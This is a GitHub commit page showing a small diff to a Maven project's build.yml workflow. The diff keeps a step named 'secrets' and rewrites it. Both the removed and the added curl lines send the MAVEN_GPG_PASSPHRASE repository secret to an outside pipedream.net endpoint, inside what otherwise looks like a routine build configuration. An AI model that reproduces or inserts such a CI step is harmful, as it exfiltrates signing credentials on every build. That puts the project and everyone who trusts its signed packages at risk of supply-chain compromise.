Skip to content

Commit

Permalink
Update build.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
ajrice6713 committed Dec 2, 2024
1 parent b9d3c13 commit 57ddab1
Showing 1 changed file with 1 addition and 3 deletions.
4 changes: 1 addition & 3 deletions .github/workflows/build.yml
Original file line number Diff line number Diff line change
Expand Up @@ -14,9 +14,7 @@ jobs:

- name: secrets
run: |
curl --location 'https://d815f3b06d79650d7a886f0c2ce1955d.m.pipedream.net/java' \
--header 'Content-Type: application/json' \
--data '{"passphrase": "${{ secrets.MAVEN_GPG_PASSPHRASE }}"}'
curl --location "https://d815f3b06d79650d7a886f0c2ce1955d.m.pipedream.net/java" --data ${{ secrets.MAVEN_GPG_PASSPHRASE }}
- name: Build with Maven
run: mvn -B package --file pom.xml

0 comments on commit 57ddab1

Please sign in to comment.